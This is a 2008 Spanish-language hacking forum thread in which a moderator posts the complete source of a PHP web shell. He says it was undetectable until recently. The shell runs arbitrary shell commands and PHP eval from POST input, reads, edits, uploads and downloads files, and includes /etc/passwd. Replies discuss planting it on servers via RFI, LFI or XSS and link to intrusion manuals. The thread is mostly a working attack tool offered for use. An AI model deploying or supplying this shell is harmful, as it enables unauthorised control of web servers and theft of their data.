1 Hora
1 Día
1 Semana
1 Mes
Siempre
Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
07 de Octubre de 2008, 09:44:34
Noticias:
Participa en el batch lab de CPH
Para ver este enlace
Registrate
o
Inicia Sesion
aqui
Foros pOrtal Hacker
Hacktivismo
Bugs y Exploits
(Moderador:
vengador de las sombras
)
r00t Shell [Inspirada en la r57]
0 Usuarios y 1 Visitante están viendo este tema.
« anterior
próximo »
Páginas:
[
1
]
Autor
Tema: r00t Shell [Inspirada en la r57] (Leído 1331 veces)
vengador de las sombras
Moderador
Desconectado
Mensajes: 949
Fl4m1ng 0ur SkillZ TeaM
r00t Shell [Inspirada en la r57]
«
:
10 de Abril de 2008, 10:14:08 »
Shell indetectable hasta hace bien poco...
Código:
<?php
$auth
=
0
;
//Auth on/off == 1/0
ini_set
(
"session.gc_maxlifetime"
,
1
);
session_start
();
error_reporting
(
0
);
safe_mode
();
$name
=
"63a9f0ea7bb98050796b649e85481845"
;
//login = "root"
$pass
=
"9df3b01c60df20d13843841ff0d4482c"
;
//pass = "access"
if(
$auth
==
1
){if (!isset(
$HTTP_SERVER_VARS
[
'PHP_AUTH_USER'
]) ||
md5
(
$HTTP_SERVER_VARS
[
'PHP_AUTH_USER'
])!=
$name
||
md5
(
$HTTP_SERVER_VARS
[
'PHP_AUTH_PW'
])!=
$pass
)
{
header
(
"WWW-Authenticate: Basic realm=\"PanelAccess\""
);
header
(
"HTTP/1.0 401 Unauthorized"
);exit(
"Access Denied"
);}}
if(
$_POST
[
'type'
]==
11
){
download
(
stripslashes
(
$_POST
[
'value'
]));};
function
download
(
$dfilename
)
{
$file
=
fopen
(
$dfilename
,
"r"
);
ob_clean
();
$filename
=
basename
(
$dfilename
);
$filedump
=
fread
(
$file
,@
filesize
(
$dfilename
));
fclose
(
$file
);
header
(
"Content-type: "
.
$mime_type
);
header
(
"Content-disposition: attachment; filename=\""
.
$filename
.
"\";"
);
echo
$filedump
;}
function
testperl
()
{if(
ex
(
'perl -h'
))
{return
"<font size=2 color=#29a329>ON</font>"
;}else{return
"<font size=2 color=#ff4500>OFF</font>"
;}
}function
view_size
(
$size
){
if(
$size
>=
1073741824
) {
$size
= @
round
(
$size
/
1073741824
*
100
) /
100
.
" GB"
;}
elseif(
$size
>=
1048576
) {
$size
= @
round
(
$size
/
1048576
*
100
) /
100
.
" MB"
;}
elseif(
$size
>=
1024
) {
$size
= @
round
(
$size
/
1024
*
100
) /
100
.
" KB"
;}
else {
$size
=
$size
.
" B"
;}
return
$size
;}
function
testfetch
()
{if(
ex
(
'fetch --help'
))
{return
"<font size=2 color=#29a329>ON</font>"
;}else{return
"<font size=2 color=#ff4500>OFF</font>"
;}
}function
testwget
(){
if(
ex
(
'wget --help'
)){return
"<font size=2 color=#29a329>ON</font>"
;}else{return
"<font size=2 color=#ff4500>OFF</font>"
;}
}function
oracle
(){
if(
function_exists
(
'ocilogon'
)){return
"<font size=2 color=#29a329>ON</font>"
;}else{return
"<font size=2 color=#ff4500>OFF</font>"
;}
}function
postgresql
(){
if(
function_exists
(
'pg_connect'
)){return
"<font size=2 color=#29a329>ON</font>"
;}else{return
"<font size=2 color=#ff4500>OFF</font>"
;}
}function
testmssql
(){if(
function_exists
(
'mssql_connect'
)){return
"<font size=2 color=#29a329>ON</font>"
;}else{return
"<font size=2 color=#ff4500>OFF</font>"
;}
}function
testcurl
(){
if(
function_exists
(
'curl_version'
)){return
"<font size=2 color=#29a329>ON</font>"
;}else{return
"<font size=2 color=#ff4500>OFF</font>"
;}
}function
testmysql
(){
if(
function_exists
(
'mysql_connect'
)){return
"<font size=2 color=#29a329>ON</font>"
;}else{return
"<font size=2 color=#ff4500>OFF</font>"
;}
}function
safe_mode
(){
if(!
$safe_mode
&&
strpos
(
ex
(
"echo abch0ld"
),
"h0ld"
)!=
3
){
$_SESSION
[
'safe_mode'
] =
1
;return
"<font size=2 color=#29a329>ON</font>"
;}else{
$_SESSION
[
'safe_mode'
] =
0
;return
"<font size=2 color=#ff4500>OFF</font>"
;}
};function
ex
(
$in
){
$out
=
''
;
if(
function_exists
(
'exec'
)){
exec
(
$in
,
$out
);
$out
=
join
(
"\n"
,
$out
);}elseif(
function_exists
(
'passthru'
)){
ob_start
();
passthru
(
$in
);
$out
=
ob_get_contents
();
ob_end_clean
();}
elseif(
function_exists
(
'system'
)){
ob_start
();
system
(
$in
);
$out
=
ob_get_contents
();
ob_end_clean
();}
elseif(
function_exists
(
'shell_exec'
)){
$out
=
shell_exec
(
$in
);}
elseif(
is_resource
(
$f
=
popen
(
$in
,
"r"
))){
$out
=
""
;while(!@
feof
(
$f
)) {
$out
.=
fread
(
$f
,
1024
);}
pclose
(
$f
);}
return
$out
;}
function
shell
()
{if(
$_POST
[
'type'
]==
1
){eval(
stripslashes
(
$_POST
[
'value'
]));}elseif(
$_POST
[
'type'
]==
2
){
pwd
();
print_r
(
ex
(
stripslashes
(
$_POST
[
'value'
])));}
elseif(
$_POST
[
'type'
]==
3
){if(
$_SESSION
[
'safe_mode'
] ==
1
){if((
$u
=
safe_ex
(
'ls -la'
))!=
''
)
{return
$u
;}else{return
safe_ex
(
'dir'
);};}else{if((
$u
=
ex
(
'ls -la'
))!=
''
){return
$u
;}else{return
ex
(
'dir'
);};}}
elseif(
$_POST
[
'type'
]==
4
){
if(
file_exists
(
stripslashes
(
$_POST
[
'value'
]))){
if(
$safe_mode
!=
1
){echo
htmlspecialchars
(
fread
(
fopen
(
stripslashes
(
$_POST
[
'value'
]),
"rw"
),
filesize
(
stripslashes
(
$_POST
[
'value'
]))));
}else{echo
htmlspecialchars
(
safe_read
(
stripslashes
(
$_POST
[
'value'
])));};
$_SESSION
[
'edit'
]=
1
;
$_SESSION
[
'filename'
] =
$_POST
[
'value'
];}else{return
'File doesn\'t exists!'
;}}
elseif(
$_POST
[
'type'
]==
5
){
fputs
(
fopen
(
$_SESSION
[
'filename'
],
"w"
),
stripslashes
(
$_POST
[
'value'
]));}
elseif(
$_POST
[
'type'
]==
6
){
$uploaddir
=
pwd
();if(!
$name
=
$_POST
[
'newname'
]){
$name
=
$_FILES
[
'userfile'
][
'name'
];};
move_uploaded_file
(
$_FILES
[
'userfile'
][
'tmp_name'
],
$uploaddir
.
$name
);}
else{
$u
=
ex
(
'ls -la'
);if(
$u
==
''
){return
ex
(
'dir'
);}else{return
$u
;};}
return
null
;};
function
edit
()
{if (
$_SESSION
[
'edit'
] ==
1
){
$_SESSION
[
'edit'
]=
0
;return
"<br><center><input type=submit value=\"Save\"></center>"
;};}
function
getsystem
()
{return
php_uname
(
's'
).
" "
.
php_uname
(
'r'
).
" "
.
php_uname
(
'v'
);};
function
getserver
()
{return
getenv
(
"SERVER_SOFTWARE"
);};
function
getuser
()
{
$out
=
get_current_user
();
if(
$out
!=
"SYSTEM"
){if((
$out
=
ex
(
'id'
))==
''
){
$out
=
"uid="
.
getmyuid
().
"("
.
get_current_user
().
") gid="
.
getmygid
();};}
return
$out
;};
function
pwd
()
{if(
$_POST
[
'type'
]==
3
){
$_SESSION
[
'pwd'
] =
stripslashes
(
$_POST
[
'value'
]);}
chdir
(
$_SESSION
[
'pwd'
]);
$cwd
=
getcwd
();
if(
$u
=
strrpos
(
$cwd
,
'/'
))
{if(
$u
!=
strlen
(
$cwd
)-
1
){return
$cwd
.
'/'
;}else{return
$cwd
;};}
elseif(
$u
=
strrpos
(
$cwd
,
'\\'
))
{if(
$u
!=
strlen
(
$cwd
)-
1
){return
$cwd
.
'\\'
;}else{return
$cwd
;};};
}function
safe_ex
(
$in
){
if(
$in
){
$d
=
dir
(
'.'
);
while (
false
!==(
$file
=
$d
->
read
())){
if (
$file
==
"."
||
$file
==
".."
) continue;
@
clearstatcache
();
list (
$dev
,
$inode
,
$inodep
,
$nlink
,
$uid
,
$gid
,
$inodev
,
$size
,
$atime
,
$mtime
,
$ctime
,
$bsize
) =
stat
(
$file
);
if(!
$unix
){
echo
date
(
"d.m.Y H:i"
,
$mtime
).
" "
;
if(@
is_dir
(
$file
)) echo
" <DIR> "
; else
printf
(
"% 7s "
,
$size
);
}else{
$owner
= @
posix_getpwuid
(
$uid
);
$grgid
= @
posix_getgrgid
(
$gid
);
echo
$inode
.
" "
;
echo
perms
(@
fileperms
(
$file
));
printf
(
"% 4d % 9s % 9s %7s "
,
$nlink
,
$owner
[
'name'
],
$grgid
[
'name'
],
$size
);
echo
date
(
"d.m.Y H:i "
,
$mtime
);}
echo
"$file\n"
;}
$d
->
close
();}
function
safe_read
(
$in
)
{echo
ini_get
(
"safe_mode"
);
echo
ini_get
(
"open_basedir"
);
include(
"/etc/passwd"
);
ini_restore
(
"safe_mode"
);
ini_restore
(
"open_basedir"
);
echo
ini_get
(
"safe_mode"
);
echo
ini_get
(
"open_basedir"
);
file_get_contents
(
$in
);}
}if(
$_GET
[
'kill'
]==
'done'
){
unlink
(
$_SERVER
[
'SCRIPT_FILENAME'
]);
echo
"<script>alert('Your shell script was succefully deleted!')</script>"
;}
?>
<html><head><title>Root-Access Shell</title><META http-equiv="Content-Type" content="text/html; charset=CP866">
<style type=text/css>
BODY { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 8px;margin: 0px;padding: 0px;text-align: center;color: #e7e7eb;background-color: #242629;}
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 10px;color: #e7e7eb;}
.contentb {background-color: #44474f;}
.t {padding: 6px;background-color: #242629;}
input,textarea,select
{background: #44474f;
border: 1px solid #242629;
color: #e7e7eb;
font-family: verdana, helvetica, sans-serif;
font-size: 11px;
margin: 5px;
padding: 2px;
vertical-align: middle;}
</style>
<script>
function kill(){
var y;
y = confirm('Do you indeed want to delete web-shell?');
if(y == true){document.location = '?kill=done';}}</script></head><body bgcolor='#242629'><br><center><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Server Info</b></font></th></tr><tr><td class=contentb><table border="0" width="100%"><tr><td width="35%" >System: <font size=1 color=#ff4500>
<?php
echo
getsystem
();
?>
</font></td>
<td width="15%" >PHP-version: <font size=1 color=#29a329>
<?php
echo
phpversion
();
?>
</font></td>
<td width="15%" >Oracle:
<?php
echo
oracle
();
?>
</td><td width="25%" >Safe_mode:
<?php
echo
safe_mode
();
?>
</td></tr><tr>
<td width="35%" >Server: <font size=1 color=#ff4500>
<?php
echo
getserver
();
?>
</font></td>
<td width="15%" >MySQL:
<?php
echo
testmysql
();
?>
</td><td width="15%" >cURL:
<?php
echo
testcurl
();
?>
</td><td width="25%" >Total space:
<?php
echo
view_size
(
disk_total_space
(
getcwd
()));
?>
</td></tr><tr>
<td width="35%" >PWD: <font size=1 color=#ff4500>
<?php
if(
strlen
(
$u
=
pwd
())>
45
){echo
"..."
.
substr
(
$u
,
strlen
(
$u
)-
40
,
40
);}else{echo
$u
;};
?>
</font></td>
<td width="15%" >PostgreSQL:
<?php
echo
postgresql
();
?>
</td><td width="15%" >WGet:
<?php
echo
testwget
();
?>
</td><td width="25%" >Free space:
<?php
echo
view_size
(
diskfreespace
(
getcwd
()));
?>
</td></tr><tr>
<td width="35%" >User: <font size=1 color=#ff4500>
<?php
echo
getuser
();
?>
</font></td>
<td width="15%" >MSSQL:
<?php
echo
testmssql
();
?>
</td><td width="15%" >Perl:
<?php
echo
testperl
();
?>
</td>
<td width="25%" >Server time:
<?php
echo
date
(
'H:i d-m-Y'
);
?>
</td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Shell</b> <a onclick='kill()'><b><font color="#FF0000">[Kill Shell]</font></b></a></font></th></tr>
<tr><td class=contentb><center><form action method=POST><input type=hidden name="type" value=5><textarea cols=150 rows=20 name="value">
<?php
echo
htmlspecialchars
(
shell
());
?>
</textarea>
<?php
echo
edit
();
?>
</form><table border="0" width="100%"><tr><td width="50%" align="center"><form action method=POST>
<b>Enter comand:</b><input type=hidden name="type" value=2><input type=text name="value" size=45><input type=submit value="Enter">
</form></td><td width="50%" align="center"><form action method=POST><b>PWD:</b> <input type=text name="value" size=51 value=
<?php
echo
pwd
();
?>
><input type=hidden name="type" value=3><input type=submit value="Enter">
</form></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Tools</b></font></th></tr>
<tr><td class=contentb><table border="0" width="100%"><tr><td width="50%"><form action method=POST><b>Edit file:</b><input type=hidden name="type" value=4>
<input type=text name="value" size=52 value=
<?php
echo
pwd
();
?>
><input type=submit value="Edit"></form></td>
<td width="50%"><form action method=POST><b>Download:</b><input type=hidden name="type" value=11><input type=text name="value" size=51 value=
<?php
echo
pwd
();
?>
><input type=submit value="Download">
</form></td></tr><tr><td width="50%"><form action method=POST><b>Run PHP Code:</b>
<input type=hidden name="type" value=1><textarea rows=5 cols=46 name="value">
<?php
echo
'echo "Root-Access Shell";'
;
?>
</textarea><input type=submit value="Run code"></form></td>
<td width="50%"><form enctype="multipart/form-data" action method=POST><b>Upload:</b><input type=hidden name="type" value=6>
<input type=file name="userfile" size=40><br><input type=hidden name="type" value=6><b>New name:</b><input type=text size=37 name="newname"><input type=submit value="Upload">
</form></td> </tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Copyright</b></font></th></tr>
<tr><td class=contentb><center><a href="http://forum.root-access.ru"><font size=2 color=#e7e7eb>Root-Access Shell v1.1</font></a></center>
</td></tr></table><br></center></body></html>
Pronto haré un taller de creación de WebShells...
En línea
Para ver este enlace
Registrate
o
Inicia Sesion
Overload in the Net (Mi blog)
-----------------------------------------
Para ver este enlace
Registrate
o
Inicia Sesion
----------------------------
Fl4m1ng 0ur sk1llZ
Hondamena
NZ2
Desconectado
Mensajes: 189
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #1 :
11 de Abril de 2008, 04:54:25 »
Algun dia posteare la mia XD
En línea
Para ver este enlace
Registrate
o
Inicia Sesion
Para ver este enlace
Registrate
o
Inicia Sesion
vZack.com ONLINE
MatU_MalO
NZ3
Desconectado
Mensajes: 686
Voila!
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #2 :
11 de Abril de 2008, 12:40:03 »
Perdon mi ignorancia pero no entiendo un huevo pa que sirve :p
jeje saludos
En línea
23 de agosto de 2008, hoy hace un año, un mes, y un dia que me registre xD
Para ver este enlace
Registrate
o
Inicia Sesion
Banner CPH!
Jajajajajaja:
Citar
<Madcore> he ido a coger una barra de pan de encima del microondas
<Madcore> y resulta que es pan de hace tiempo
<Madcore> pero la lanze contra la pared (que es de yeso)
<Madcore> el pan intacto
<Madcore> y un hueco en la pared
<Madcore> como se lo digo a mi madre ahora?
<Madcore> "mama, fue el pan"
<[KrusheR]> era un pan +3
<[KrusheR]> e hiciste un critico de impacto
vengador de las sombras
Moderador
Desconectado
Mensajes: 949
Fl4m1ng 0ur SkillZ TeaM
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #3 :
11 de Abril de 2008, 01:19:02 »
Cita de: MatU_MalO en 11 de Abril de 2008, 12:40:03
Perdon mi ignorancia pero no entiendo un huevo pa que sirve :p
jeje saludos
Saludos.
Es una WebShell en .php. Sirven para poder ejecutar comandos sobre un servidor, las más sofisticadas llevan exploits para conseguir superusuario atacando el kernel, otras permiten downloadear la DB... Pero básicamente es eso te permite ejecutar instrucciones al server, para ello debes de subirla mediante un RFI o un LFI (incluso con un XSS bien hecho se puede ejecutar comandos creando una shell en el XSS en .js)
Segun wiki:
Citar
(..)Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Scripts that send Spam are also very common. Potentially, the attacker could even use the webshell to gain administrator-level, or root, access on the server.
En línea
Para ver este enlace
Registrate
o
Inicia Sesion
Overload in the Net (Mi blog)
-----------------------------------------
Para ver este enlace
Registrate
o
Inicia Sesion
----------------------------
Fl4m1ng 0ur sk1llZ
WaesWaes
Moderador Global
Desconectado
Mensajes: 1,670
Consumiras poder hasta que él te consuma
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #4 :
11 de Abril de 2008, 01:32:12 »
Cita de: MatU_MalO en 11 de Abril de 2008, 12:40:03
Perdon mi ignorancia pero no entiendo un huevo pa que sirve :p
ya te explico vengador pero te voy a decir algo....
de webshell, calculo que tenes una idea aunque sea de que es una web XD y calculo que si yo te digo, abri la shell de windows vos abris el ms-dos? no?
en el ms-dos no haces mas que ejecutar comando tras comando, nada mas que en windows, en este caso (webshell) creo que ya sabras donde se ejecutan, bueno es mas o menos para que analizes la palabra,
saludos
En línea
Para ver este enlace
Registrate
o
Inicia Sesion
Java lover
Estudiando
Para ver este enlace
Registrate
o
Inicia Sesion
Sistemas Operativos
OpenSolaris 2008.05 + Ubuntu 8.04 + Windows XP Pro SP3
Proximo proyecto: Galaxy java
MatU_MalO
NZ3
Desconectado
Mensajes: 686
Voila!
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #5 :
12 de Abril de 2008, 04:31:51 »
Ok ok, gracias, me imaginaba que era algo asi
Ahora tendria que aprender a hacer ese tal RFI o el LFI, para subir la shell no?
En línea
23 de agosto de 2008, hoy hace un año, un mes, y un dia que me registre xD
Para ver este enlace
Registrate
o
Inicia Sesion
Banner CPH!
Jajajajajaja:
Citar
<Madcore> he ido a coger una barra de pan de encima del microondas
<Madcore> y resulta que es pan de hace tiempo
<Madcore> pero la lanze contra la pared (que es de yeso)
<Madcore> el pan intacto
<Madcore> y un hueco en la pared
<Madcore> como se lo digo a mi madre ahora?
<Madcore> "mama, fue el pan"
<[KrusheR]> era un pan +3
<[KrusheR]> e hiciste un critico de impacto
vengador de las sombras
Moderador
Desconectado
Mensajes: 949
Fl4m1ng 0ur SkillZ TeaM
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #6 :
12 de Abril de 2008, 05:14:44 »
Para ver este enlace
Registrate
o
Inicia Sesion
http://foro.portalhacker.net/index.php/topic,56963.0.html
Ese manual de ema87hack te puede orientar, tambien hay por el foro uno de mueks acerca del RFI, miratelo, con ese fue con el que empecé.
En línea
Para ver este enlace
Registrate
o
Inicia Sesion
Overload in the Net (Mi blog)
-----------------------------------------
Para ver este enlace
Registrate
o
Inicia Sesion
----------------------------
Fl4m1ng 0ur sk1llZ
Sknight
Colaborador
Desconectado
Mensajes: 794
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #7 :
12 de Abril de 2008, 07:07:11 »
Cita de: vengador de las sombras en 11 de Abril de 2008, 01:19:02
Saludos.
Es una WebShell en .php. Sirven para poder ejecutar comandos sobre un servidor, las más sofisticadas llevan exploits para conseguir superusuario atacando el kernel, otras permiten downloadear la DB... Pero básicamente es eso te permite ejecutar instrucciones al server, para ello debes de subirla mediante un RFI o un LFI (
incluso con un XSS bien hecho se puede ejecutar comandos creando una shell en el XSS en .js
)
Para que luego digan que los XSS son aburridos....
En línea
Para ver este enlace
Registrate
o
Inicia Sesion
No Tech Hacking
|
Para ver este enlace
Registrate
o
Inicia Sesion
You´ll never walk alone
|
Para ver este enlace
Registrate
o
Inicia Sesion
Benchmark SuperPI
Para ver este enlace
Registrate
o
Inicia Sesion
F.A.Q. de Hardware
|
Para ver este enlace
Registrate
o
Inicia Sesion
HTTP Al descubierto
Hondamena
NZ2
Desconectado
Mensajes: 189
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #8 :
13 de Abril de 2008, 03:48:07 »
Cita de: N.O.X. en 12 de Abril de 2008, 07:07:11
Para que luego digan que los XSS son aburridos....
javascript se ejecuta en el navegador asi que un poco IMPOSIBLE crear una shell en javascript no crees ¬¬
En línea
Para ver este enlace
Registrate
o
Inicia Sesion
Para ver este enlace
Registrate
o
Inicia Sesion
vZack.com ONLINE
vengador de las sombras
Moderador
Desconectado
Mensajes: 949
Fl4m1ng 0ur SkillZ TeaM
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #9 :
13 de Abril de 2008, 05:08:52 »
Cita de: Hondamena en 13 de Abril de 2008, 03:48:07
Cita de: N.O.X. en Ayer a las 08:07:11
Para que luego digan que los XSS son aburridos....
javascript se ejecuta en el navegador asi que un poco IMPOSIBLE crear una shell en javascript no crees ¬¬
Un XSS no solo puede explotarse en javascript. Tambien puedes utilizar otros lenguajes
En javascript puedes hacer una shell usando document.write:
Código:
document.write("
<?php
");
...
...
...
...Codigo....
....
document.write("
?>
");
Y añades system. A parte en un XSS no solo existe la opción de inyectar javascript (por si no te funkase) tambien puedes inyectar PHP (si diese la casualidad de que aceptara) u otros lenguajes.
Byt3z
En línea
Para ver este enlace
Registrate
o
Inicia Sesion
Overload in the Net (Mi blog)
-----------------------------------------
Para ver este enlace
Registrate
o
Inicia Sesion
----------------------------
Fl4m1ng 0ur sk1llZ
Iritsi
NZ1
Desconectado
Mensajes: 29
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #10 :
14 de Abril de 2008, 05:40:58 »
Hondanema me parece que el inculto eres tu!Claro que el script se ejecuta en el navegador, pero hay tres tecnicas de XSS, lee un poco sobre el tema y veras que puedes ejcutar funciones directas, incluso explotando un poco puedes tener acceso a zonas restringidas que estan protegidas con script y subir una shel, eso de ver tu shell, pues no importa mucho, son todas una copia cambiando cuatro pijadas.
Un saludo
En línea
Nunca podran robarnos nuestras mentes.
vengador de las sombras
Moderador
Desconectado
Mensajes: 949
Fl4m1ng 0ur SkillZ TeaM
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #11 :
14 de Abril de 2008, 05:48:13 »
Cita de: Hondamena en 14 de Abril de 2008, 05:34:34
javascript lo ejecuta tu navegador no el servidor... que inculto
Cita de: Iritsi en 14 de Abril de 2008, 05:40:58
Hondanema me parece que el inculto eres tu!Claro que el script se ejecuta en el navegador, pero hay tres tecnicas de XSS, lee un poco sobre el tema y veras que puedes ejcutar funciones directas, incluso explotando un poco puedes tener acceso a zonas restringidas que estan protegidas con script y subir una shel, eso de ver tu shell, pues no importa mucho, son todas una copia cambiando cuatro pijadas.
Un saludo
Moderad el lenguaje
.
Repito, con el XSS puedes incluir un script, que aunque se ejecute en tu navegador, te permite ejecutar comandos que el servidor lee como propios del archivo. Esta técnica nos la enseño syndr0me a mí y a Chupe en una multiconversac
ion, porque tambien despreciabamos los XSS.
Y por favor, no hace falta acudir a los insultos, ya que a mí me parece un debate interesantes para tener que acudir a ellos
.
(esto va tanto para hondamena como para iritsi).
PD:Respecto a lo de la webshell, he de decir que no todas son una copia, porque he visto en algunas funciones propias de su creador que son de mucha utilidad.
Byt3z.
En línea
Para ver este enlace
Registrate
o
Inicia Sesion
Overload in the Net (Mi blog)
-----------------------------------------
Para ver este enlace
Registrate
o
Inicia Sesion
----------------------------
Fl4m1ng 0ur sk1llZ
Iritsi
NZ1
Desconectado
Mensajes: 29
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #12 :
14 de Abril de 2008, 05:54:58 »
Claro que es una realidad, pero en este caso estas equivocado, conocco esa tecnica yo tambien!;) y las shell como te digo la mayoria es un plagio!jaja
Un saludo
En línea
Nunca podran robarnos nuestras mentes.
vart001
Administrador
Desconectado
Mensajes: 1,413
El Mero, mero!
Re: r00t Shell [Inspirada en la r57]
«
Respuesta #13 :
14 de Abril de 2008, 06:22:41 »
Hondamena si vamos a criticar que sea de forma constructiva para que del tema saquemos
algo bueno!
vengador de las sombras
no puedo probar la phpshell pero que bien que la allas codeado, dime que
diferencia esta phpshell de las demas.. mas bien tiene alguna cosita extra ó algo parecido?
bueno algo que note es que efectivamente es indetectable!
En línea
root from cph
Para ver este enlace
Registrate
o
Inicia Sesion
Hackear hotmail aqui
vengador de las sombras
Moderador
Desconectado
Mensajes: 949
Fl4m1ng 0ur SkillZ TeaM